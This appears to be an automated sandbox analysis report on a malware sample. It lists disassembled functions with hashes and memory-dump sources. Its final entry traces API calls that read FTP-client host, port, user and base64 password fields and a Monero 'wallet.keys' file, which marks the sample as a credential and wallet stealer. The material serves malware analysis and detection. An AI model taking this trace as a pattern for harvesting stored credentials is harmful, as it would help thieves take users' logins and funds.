                        • Opcode Fuzzy Hash: a0eca6a029677fc40a0e39b8a8d203a5d0176beecc3a176bae95ff33583d9d7a
                        • Instruction Fuzzy Hash: F27114B39087149FE314AE2DDC4576AFBE5EB90720F1A8A2DE9C8D7784E93548418783
                        Function 00BCA9B8 Relevance: 1.5, Strings: 1, Instructions: 221COMMON
                        Download Yara Rule
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2091222902.0000000000ABE000.00000040.00000001.01000000.00000003.sdmp, Offset: 00860000, based on PE: true
                        • Associated: 00000000.00000002.2091063671.0000000000860000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091077451.0000000000861000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091077451.0000000000911000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091077451.000000000091D000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091077451.0000000000942000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091077451.0000000000AAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091222902.0000000000C48000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091222902.0000000000D21000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091222902.0000000000D41000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091222902.0000000000D4B000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091222902.0000000000D59000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091449535.0000000000D5A000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091549519.0000000000EF2000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091562892.0000000000EF3000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_860000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID: 8+
                        • API String ID: 0-2599851556
                        • Opcode ID: 8335cf130ff19245e35ef1d8efb864d1148381becf150896393c34c23b75d8a6
                        • Instruction ID: a1f1ca8f73863aeef3c908205f591c16339b68421a2368eec420e5b170f63adc
                        • Opcode Fuzzy Hash: 8335cf130ff19245e35ef1d8efb864d1148381becf150896393c34c23b75d8a6
                        • Instruction Fuzzy Hash: 3A71F8F3A086009FE318AF19DC8577AB7D5EF94320F2A853DEAC497740EA359D418786
                        Function 00B5C93D Relevance: 1.4, Strings: 1, Instructions: 198COMMON
                        Download Yara Rule
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2091222902.0000000000ABE000.00000040.00000001.01000000.00000003.sdmp, Offset: 00860000, based on PE: true
                        • Associated: 00000000.00000002.2091063671.0000000000860000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091077451.0000000000861000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091077451.0000000000911000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091077451.000000000091D000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091077451.0000000000942000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091077451.0000000000AAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091222902.0000000000C48000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091222902.0000000000D21000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091222902.0000000000D41000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091222902.0000000000D4B000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091222902.0000000000D59000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091449535.0000000000D5A000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091549519.0000000000EF2000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091562892.0000000000EF3000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_860000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID: nQ|H
                        • API String ID: 0-1817109747
                        • Opcode ID: 0807b5043632ffdbf47e78b7070f30c93316d50f971b6e459bc61cd8b3e1d94c
                        • Instruction ID: 9211eb891a713c94a45e3d1d26b51ea6974bc8e11cc8ef32836f3b94021de31c
                        • Opcode Fuzzy Hash: 0807b5043632ffdbf47e78b7070f30c93316d50f971b6e459bc61cd8b3e1d94c
                        • Instruction Fuzzy Hash: 08516CF3A183109BE3046A28DC4577BB7D5EBA4760F1A853DEAD8D7780E9398C018786
                        Function 00B22BEB Relevance: 1.4, Strings: 1, Instructions: 188COMMON
                        Download Yara Rule
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2091222902.0000000000ABE000.00000040.00000001.01000000.00000003.sdmp, Offset: 00860000, based on PE: true
                        • Associated: 00000000.00000002.2091063671.0000000000860000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091077451.0000000000861000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091077451.0000000000911000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091077451.000000000091D000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091077451.0000000000942000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091077451.0000000000AAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091222902.0000000000C48000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091222902.0000000000D21000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091222902.0000000000D41000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091222902.0000000000D4B000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091222902.0000000000D59000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091449535.0000000000D5A000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091549519.0000000000EF2000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091562892.0000000000EF3000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_860000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID: ~f?_
                        • API String ID: 0-1173674360
                        • Opcode ID: e188442e1fff628f0501e18faf68ef5e7514f6e6f1311a6676b61bdc8d8859e1
                        • Instruction ID: 7201eca0de061151e42f8ecf61a1c636abaaa01f5f904833fccaef82514560f0
                        • Opcode Fuzzy Hash: e188442e1fff628f0501e18faf68ef5e7514f6e6f1311a6676b61bdc8d8859e1
                        • Instruction Fuzzy Hash: 26516AF3A186148BE748AE29DC84377B7E1EFC4310F1A453DDB8997384DA35684587CA
                        Function 00AEC90F Relevance: 1.4, Strings: 1, Instructions: 164COMMON
                        Download Yara Rule
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2091222902.0000000000ABE000.00000040.00000001.01000000.00000003.sdmp, Offset: 00860000, based on PE: true
                        • Associated: 00000000.00000002.2091063671.0000000000860000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091077451.0000000000861000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091077451.0000000000911000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091077451.000000000091D000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091077451.0000000000942000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091077451.0000000000AAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091222902.0000000000C48000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091222902.0000000000D21000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091222902.0000000000D41000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091222902.0000000000D4B000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091222902.0000000000D59000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091449535.0000000000D5A000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091549519.0000000000EF2000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091562892.0000000000EF3000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_860000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID: AL?{
                        • API String ID: 0-3831830120
                        • Opcode ID: 7d0f28a46275e7f13dac177772a60ac29fd3c4be5db38a7f6e956b911cbe8f3e
                        • Instruction ID: 8422aead84ce08c6d21407de967a8ca65bc5b7fdfccb886e0b5ecf68966eb86b
                        • Opcode Fuzzy Hash: 7d0f28a46275e7f13dac177772a60ac29fd3c4be5db38a7f6e956b911cbe8f3e
                        • Instruction Fuzzy Hash: 4A4159B7B182101FF31C9969EC69777668AD7D4720F2E423EEB86D7380EC695C0542A0
                        Function 00B69861 Relevance: .2, Instructions: 158COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000000.00000002.2091222902.0000000000ABE000.00000040.00000001.01000000.00000003.sdmp, Offset: 00860000, based on PE: true
                        • Associated: 00000000.00000002.2091063671.0000000000860000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091077451.0000000000861000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091077451.0000000000911000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091077451.000000000091D000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091077451.0000000000942000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091077451.0000000000AAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091222902.0000000000C48000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091222902.0000000000D21000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091222902.0000000000D41000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091222902.0000000000D4B000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091222902.0000000000D59000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091449535.0000000000D5A000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091549519.0000000000EF2000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091562892.0000000000EF3000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_860000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 41e7a49992ca134b45417d546cc977d6d36e2343b4a970ba60404fde261d00f3
                        • Instruction ID: 88fb65fc6b311437211bc144a9a416195edf293fc620468e96f9d1d57257005d
                        • Opcode Fuzzy Hash: 41e7a49992ca134b45417d546cc977d6d36e2343b4a970ba60404fde261d00f3
                        • Instruction Fuzzy Hash: 5E41BBF3D492385BD318293DFC057B6B7869B90661F1A823EDE8197B88FE78490543C4
                        Function 00BC9727 Relevance: .1, Instructions: 139COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000000.00000002.2091222902.0000000000ABE000.00000040.00000001.01000000.00000003.sdmp, Offset: 00860000, based on PE: true
                        • Associated: 00000000.00000002.2091063671.0000000000860000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091077451.0000000000861000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091077451.0000000000911000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091077451.000000000091D000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091077451.0000000000942000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091077451.0000000000AAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091222902.0000000000C48000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091222902.0000000000D21000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091222902.0000000000D41000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091222902.0000000000D4B000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091222902.0000000000D59000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091449535.0000000000D5A000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091549519.0000000000EF2000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091562892.0000000000EF3000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_860000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: a405d441641221bd24b99fdc77f4711c9e66797cf24a95793de6ffe6696b4d62
                        • Instruction ID: e826a458654f7ed8fd143078368618dc4e6280badfcef3d73419d8b89cf67ab0
                        • Opcode Fuzzy Hash: a405d441641221bd24b99fdc77f4711c9e66797cf24a95793de6ffe6696b4d62
                        • Instruction Fuzzy Hash: 8B419CF3D082109BE3142929DC847BBB7E9DBD4320F3B423DEB9493B80E939580681C6
                        Function 00D25775 Relevance: .1, Instructions: 134COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000000.00000002.2091222902.0000000000D21000.00000040.00000001.01000000.00000003.sdmp, Offset: 00860000, based on PE: true
                        • Associated: 00000000.00000002.2091063671.0000000000860000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091077451.0000000000861000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091077451.0000000000911000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091077451.000000000091D000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091077451.0000000000942000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091077451.0000000000AAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091222902.0000000000ABE000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091222902.0000000000C48000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091222902.0000000000D41000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091222902.0000000000D4B000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091222902.0000000000D59000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091449535.0000000000D5A000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091549519.0000000000EF2000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091562892.0000000000EF3000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_860000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: fc6c11c9278f72a7f0ccabc0dcf175ee7f0917bdb09b8ababe15df75b23dd898
                        • Instruction ID: 1aa001aaeae6ac95d22617e0fce99a85affb31670f0e42e13791ceebef7750fe
                        • Opcode Fuzzy Hash: fc6c11c9278f72a7f0ccabc0dcf175ee7f0917bdb09b8ababe15df75b23dd898
                        • Instruction Fuzzy Hash: D9313CB791CA30DFD2095A15FC40D7AF7D5DBA4328F22462ED5C787648E571CC4096E2
                        Function 00D1F27D Relevance: .1, Instructions: 131COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000000.00000002.2091222902.0000000000C48000.00000040.00000001.01000000.00000003.sdmp, Offset: 00860000, based on PE: true
                        • Associated: 00000000.00000002.2091063671.0000000000860000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091077451.0000000000861000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091077451.0000000000911000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091077451.000000000091D000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091077451.0000000000942000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091077451.0000000000AAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091222902.0000000000ABE000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091222902.0000000000D21000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091222902.0000000000D41000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091222902.0000000000D4B000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091222902.0000000000D59000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091449535.0000000000D5A000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091549519.0000000000EF2000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091562892.0000000000EF3000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_860000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 557dfc84bf4cfcfd0a6abc9b4808661af97507bad5f6b5925162e0d3cac6b611
                        • Instruction ID: eca897f238d0200a065beda0fd914a59f2d9b513101134da026121fbae07afb2
                        • Opcode Fuzzy Hash: 557dfc84bf4cfcfd0a6abc9b4808661af97507bad5f6b5925162e0d3cac6b611
                        • Instruction Fuzzy Hash: D741A2B640D200EBD305BF15E9455BEF7E2EF94720F26482DE5D283604DB349881DBA7
                        Function 00CCF3B4 Relevance: .1, Instructions: 103COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000000.00000002.2091222902.0000000000C48000.00000040.00000001.01000000.00000003.sdmp, Offset: 00860000, based on PE: true
                        • Associated: 00000000.00000002.2091063671.0000000000860000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091077451.0000000000861000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091077451.0000000000911000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091077451.000000000091D000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091077451.0000000000942000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091077451.0000000000AAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091222902.0000000000ABE000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091222902.0000000000D21000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091222902.0000000000D41000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091222902.0000000000D4B000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091222902.0000000000D59000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091449535.0000000000D5A000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091549519.0000000000EF2000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091562892.0000000000EF3000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_860000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 631381a2df7b063ab2d4b7acef2521338eb493270d901e7ced98c09728a7b296
                        • Instruction ID: bb5a162e7003f4e9a0397564d477533bd2af6a4311bd7660d995dcffb7ec9378
                        • Opcode Fuzzy Hash: 631381a2df7b063ab2d4b7acef2521338eb493270d901e7ced98c09728a7b296
                        • Instruction Fuzzy Hash: 7631F2B211C7009FE709AF29E8866BEFBE4FF58320F56092DE2D582640DB755480CB57
                        Function 00B75ED6 Relevance: .1, Instructions: 95COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000000.00000002.2091222902.0000000000ABE000.00000040.00000001.01000000.00000003.sdmp, Offset: 00860000, based on PE: true
                        • Associated: 00000000.00000002.2091063671.0000000000860000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091077451.0000000000861000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091077451.0000000000911000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091077451.000000000091D000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091077451.0000000000942000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091077451.0000000000AAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091222902.0000000000C48000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091222902.0000000000D21000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091222902.0000000000D41000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091222902.0000000000D4B000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091222902.0000000000D59000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091449535.0000000000D5A000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091549519.0000000000EF2000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091562892.0000000000EF3000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_860000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: e30ab4fc675421d461439280b88d601de14afff517015e20fe7289bcc56c02d7
                        • Instruction ID: 5495cdc9587f20051e9f069949eb45c60cdfbcaeeeba32b3943d90a1b3c00806
                        • Opcode Fuzzy Hash: e30ab4fc675421d461439280b88d601de14afff517015e20fe7289bcc56c02d7
                        • Instruction Fuzzy Hash: 25210FF7E086205BF300AD2DEC847ABB795ABD4320F2B4439DB98A7381E5795C0582C5
                        Function 00879750 Relevance: .0, Instructions: 15COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000000.00000002.2091077451.0000000000861000.00000040.00000001.01000000.00000003.sdmp, Offset: 00860000, based on PE: true
                        • Associated: 00000000.00000002.2091063671.0000000000860000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091077451.0000000000911000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091077451.000000000091D000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091077451.0000000000942000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091077451.0000000000AAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091222902.0000000000ABE000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091222902.0000000000C48000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091222902.0000000000D21000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091222902.0000000000D41000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091222902.0000000000D4B000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091222902.0000000000D59000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091449535.0000000000D5A000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091549519.0000000000EF2000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091562892.0000000000EF3000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_860000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: eecc59efbe9cdf3acfc8abb57b86a9aab05cbe8bc62256deaf8fcc3308cb31aa
                        • Instruction ID: abbdd297b848902a35704da264ecc4a7d2e6ec457c67c65f9fa5c7ab4ebdfac4
                        • Opcode Fuzzy Hash: eecc59efbe9cdf3acfc8abb57b86a9aab05cbe8bc62256deaf8fcc3308cb31aa
                        • Instruction Fuzzy Hash: 1EE04878A56608EFC740CF88D584E49B7F8EB0D720F1181D5ED099B721D235EE00EA90
                        Function 00870250 Relevance: 68.6, APIs: 29, Strings: 10, Instructions: 366stringmemoryCOMMON
                        Download Yara Rule
                        APIs
                          • Part of subcall function 0087A740: lstrcpy.KERNEL32(00880E17,00000000), ref: 0087A788
                          • Part of subcall function 00878DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00878E0B
                          • Part of subcall function 0087A920: lstrcpy.KERNEL32(00000000,?), ref: 0087A972
                          • Part of subcall function 0087A920: lstrcat.KERNEL32(00000000), ref: 0087A982
                          • Part of subcall function 0087A8A0: lstrcpy.KERNEL32(?,00880E17), ref: 0087A905
                          • Part of subcall function 0087A9B0: lstrlen.KERNEL32(?,011695A8,?,\Monero\wallet.keys,00880E17), ref: 0087A9C5
                          • Part of subcall function 0087A9B0: lstrcpy.KERNEL32(00000000), ref: 0087AA04
                          • Part of subcall function 0087A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0087AA12
                          • Part of subcall function 0087A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0087A7E6
                          • Part of subcall function 008699C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 008699EC
                          • Part of subcall function 008699C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00869A11
                          • Part of subcall function 008699C0: LocalAlloc.KERNEL32(00000040,?), ref: 00869A31
                          • Part of subcall function 008699C0: ReadFile.KERNEL32(000000FF,?,00000000,0086148F,00000000), ref: 00869A5A
                          • Part of subcall function 008699C0: LocalFree.KERNEL32(0086148F), ref: 00869A90
                          • Part of subcall function 008699C0: CloseHandle.KERNEL32(000000FF), ref: 00869A9A
                          • Part of subcall function 00878E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00878E52
                        • GetProcessHeap.KERNEL32(00000000,000F423F,00880DBA,00880DB7,00880DB6,00880DB3), ref: 00870362
                        • RtlAllocateHeap.NTDLL(00000000), ref: 00870369
                        • StrStrA.SHLWAPI(00000000,<Host>), ref: 00870385
                        • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00880DB2), ref: 00870393
                        • StrStrA.SHLWAPI(00000000,<Port>), ref: 008703CF
                        • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00880DB2), ref: 008703DD
                        • StrStrA.SHLWAPI(00000000,<User>), ref: 00870419
                        • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00880DB2), ref: 00870427
                        • StrStrA.SHLWAPI(00000000,<Pass encoding="base64">), ref: 00870463
                        • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00880DB2), ref: 00870475
                        • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00880DB2), ref: 00870502
                        • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00880DB2), ref: 0087051A
                        • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00880DB2), ref: 00870532
                        • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00880DB2), ref: 0087054A
